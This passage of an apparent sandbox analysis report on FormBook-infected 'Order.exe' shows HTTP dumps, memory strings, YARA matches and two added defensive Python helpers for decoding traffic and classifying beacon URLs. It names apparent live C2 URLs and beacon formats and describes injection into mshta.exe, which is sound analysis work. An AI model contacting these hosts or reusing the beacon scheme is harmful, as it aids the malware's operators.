6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:50 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 24 Oct 2024 06:03:55 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
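The two Apache responses at 06:02:58 and 06:03:01 are sent with Transfer-Encoding: chunked and Content-Encoding: gzip, so their Data Ascii rendering is unreadable; the Apache response at 06:03:03 is the uncompressed form with Content-Length: 1271. The Python helper below is added here and is not part of the Joe Sandbox report. It turns a "Data Raw" hex dump back into the plaintext body (de-chunk, then gunzip) and, as a cheaper cross-check that needs only the last eight bytes of the dump, reads the ISIZE field of the gzip trailer: for the bytes 9d a7 e3 e7 f7 04 00 00 copied from the end of the compressed responses above it comes out as 1271, consistent with the uncompressed sibling. The full 569-byte member is not repeated here, so the round-trip runs on a constructed body.

```python
import gzip
import re
import struct
from typing import Tuple

# Last eight bytes of the gzip member in the compressed Apache 404 responses above,
# copied from the end of their "Data Raw" field (just before 0d 0a 30 0d 0a 0d 0a).
GZIP_TRAILER_FROM_REPORT = "9d a7 e3 e7 f7 04 00 00"


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' field (space-separated hex octets) into bytes."""
    return bytes.fromhex("".join(re.findall(r"[0-9a-fA-F]{2}", dump)))


def dechunk(body: bytes) -> bytes:
    """Decode an HTTP/1.1 chunked transfer coding: hex size line, data, CRLF, ..., 0 CRLF CRLF."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)  # drop any chunk extension
        pos = eol + 2
        if size == 0:
            break  # last-chunk; optional trailer fields and a final CRLF follow
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2
    return bytes(out)


def gzip_trailer(member: bytes) -> Tuple[int, int]:
    """(CRC32, ISIZE) from the last 8 bytes of a gzip member, both little-endian (RFC 1952)."""
    crc, isize = struct.unpack("<II", member[-8:])
    return crc, isize


def isize_from_trailer_hex(trailer_hex: str) -> int:
    """Uncompressed length recorded in a gzip trailer pasted as hex from a report."""
    return gzip_trailer(hex_dump_to_bytes(trailer_hex))[1]


def decode_gzip_chunked_body(dump: str) -> bytes:
    """Recover the plaintext of a chunked + gzip response body from its hex dump.
    gzip.decompress verifies CRC32 and ISIZE itself, so a mangled dump raises here."""
    return gzip.decompress(dechunk(hex_dump_to_bytes(dump)))


def make_chunked_gzip_dump(plain: bytes) -> str:
    """Constructed input: the wire form of a Content-Encoding: gzip, Transfer-Encoding:
    chunked body (one chunk plus last-chunk), rendered as a 'Data Raw' style hex dump."""
    member = gzip.compress(plain, mtime=0)
    wire = b"%x\r\n" % len(member) + member + b"\r\n0\r\n\r\n"
    return " ".join(f"{b:02x}" for b in wire)


if __name__ == "__main__":
    sample = b"<!DOCTYPE html>\n<html>\n <head>\n  <meta charset=\"utf-8\">\n"  # constructed
    print(decode_gzip_chunked_body(make_chunked_gzip_dump(sample)).decode())
    print("ISIZE in the report's trailer:", isize_from_trailer_hex(GZIP_TRAILER_FROM_REPORT))
```

To use it on the report, paste the whole Data Raw field of one of the compressed responses into `decode_gzip_chunked_body`; if the hex was copied with an error, the gzip CRC check fails instead of returning a silently wrong page.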
                  Source: Order.exe, 00000000.00000002.1737474491.0000000002A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Order.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: mshta.exe, 00000009.00000002.4144994745.000000000546A000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003B5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.luxe.guru/
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Order.exe, 00000000.00000002.1755072561.0000000005324000.00000004.00000020.00020000.00000000.sdmp, Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop
                  Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4145802850.0000000004AB8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop/h8b0/
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Order.exe, 00000000.00000002.1757632141.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: mshta.exe, 00000009.00000002.4144994745.0000000004324000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000002A14000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: mshta.exe, 00000009.00000002.4143600767.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                  Source: mshta.exe, 00000009.00000003.2085578050.0000000008386000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                  Source: mshta.exe, 00000009.00000002.4144994745.000000000578E000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003E7E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: mshta.exe, 00000009.00000003.2096961830.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: firefox.exe, 0000000D.00000002.2206128704.000000000D164000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
                  Source: mshta.exe, 00000009.00000002.4144994745.0000000004E22000.00000004.10000000.00040000.00000000.sdmp, mkvfHfXifKJWp.exe, 0000000C.00000002.4144297992.0000000003512000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP
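Most URLs in the list above are not indicators. The font-foundry addresses in Order.exe (fontbureau.com, sakkal.com, sandoll.co.kr, tiro.com and the rest) are name-table strings of fonts embedded in the .NET binary, and the search-provider and login.live.com strings in mshta.exe belong to the browser component that process hosts. The three URLs in the memory of the injected mkvfHfXifKJWp.exe with a short path segment and, in two cases, a single query key (kf-HBx) have the shape FormBook beacons are known to use, and FormBook is known to contact decoy domains alongside its real C2, which is why the traffic section above is a row of 404s and why a 404 does not clear a domain. The Python below, an added example and not part of the report, separates the list on that basis. The noise host list and the path shape are this example's own assumptions; the strings are a subset copied from the entries above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Subset of the "String found in binary or memory" entries above, as (process, string).
STRINGS = [
    ("Order.exe", "http://www.fontbureau.com/designers/cabarga.htmlN"),
    ("Order.exe", "http://www.sakkal.com"),
    ("Order.exe", "http://www.apache.org/licenses/LICENSE-2.0"),
    ("mshta.exe", "https://duckduckgo.com/ac/?q="),
    ("mshta.exe", "https://login.live.com/oauth20_desktop.srf?lc=1033"),
    ("mshta.exe", "http://www.luxe.guru/"),
    ("mkvfHfXifKJWp.exe", "http://www.tukaari.shop/h8b0/"),
    ("mkvfHfXifKJWp.exe", "https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U"),
    ("mkvfHfXifKJWp.exe", "https://www.tmstore.click/qmcg/?kf-HBx=67IAuCDTBw5QZph7iUnsNNZg0vqYuCAKYaPJ7pOH3jPtJouGJ8FP"),
    ("firefox.exe", "https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect"),
]

# Hosts expected in these processes for reasons unrelated to the malware (an assumption
# of this example): font foundries from the name tables of fonts embedded in the .NET
# binary, schema and licence URLs, and search-provider / Microsoft-account endpoints
# carried by the browser component hosted in mshta.exe.
NOISE_HOSTS = (
    "fontbureau.com", "sakkal.com", "sandoll.co.kr", "tiro.com", "typography.net",
    "fonts.com", "founder.com.cn", "galapagosdesign.com", "goodfont.co.kr",
    "jiyu-kobo.co.jp", "carterandcone.com", "urwpp.de", "zhongyicts.com.cn",
    "sajatypeworks.com", "apache.org", "tempuri.org", "schemas.xmlsoap.org",
    "duckduckgo.com", "ecosia.org", "yahoo.com", "google.com", "login.live.com",
    "fonts.googleapis.com", "strikingly.com",
)

# Beacon shape visible in this report and characteristic of FormBook: one short
# alphanumeric path segment, optionally followed by a single query parameter whose
# value is an encoded blob. The 3..8 length range is this example's choice.
BEACON_PATH_RE = re.compile(r"^/[A-Za-z0-9]{3,8}/$")


def is_noise_host(host: str) -> bool:
    """Exact or subdomain match against the noise list (no substring matches)."""
    return any(host == h or host.endswith("." + h) for h in NOISE_HOSTS)


def classify(strings):
    """Split (process, url) pairs into expected noise, beacon-shaped URLs and the rest."""
    out = {"noise": [], "beacon": [], "other": []}
    for proc, url in strings:
        parts = urlsplit(url)
        host = parts.hostname or ""
        rec = {"proc": proc, "url": url, "host": host}
        if is_noise_host(host):          # checked first: "/ac/" on duckduckgo.com also fits the shape
            out["noise"].append(rec)
        elif BEACON_PATH_RE.match(parts.path):
            rec["path"] = parts.path
            rec["key"] = parts.query.split("=", 1)[0] if parts.query else None
            out["beacon"].append(rec)
        else:
            out["other"].append(rec)     # bare hosts such as luxe.guru still deserve a look
    return out


def link_by_key(beacons):
    """Group beacon hosts by query parameter name. One name across several domains
    points at one configuration, which is how a sample's decoy and real C2 domains
    travel together."""
    groups = defaultdict(list)
    for b in beacons:
        groups[b["key"] or "(no query)"].append(b["host"])
    return dict(groups)


if __name__ == "__main__":
    result = classify(STRINGS)
    for bucket, recs in result.items():
        print(bucket, [r["url"] for r in recs])
    print(link_by_key(result["beacon"]))
```

The noise check runs before the shape check on purpose: a search-provider autocomplete path like /ac/ matches the beacon regex, and the host list, not the path, is what separates the two.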

                  E-Banking Fraud

                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: 5.2.Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 5.2.Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1904953976.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4144193946.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4144156725.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1904392039.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 0000000C.00000002.4145802850.0000000004A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000005.00000002.1906112434.0000000001D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: 00000007.00000002.4144094992.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                  Source: initial sampleStatic PE information: Filename: Order.exe
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0042C8B3 NtClose,5_2_0042C8B3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982B60 NtClose,LdrInitializeThunk,5_2_01982B60
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01982DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01982DF0
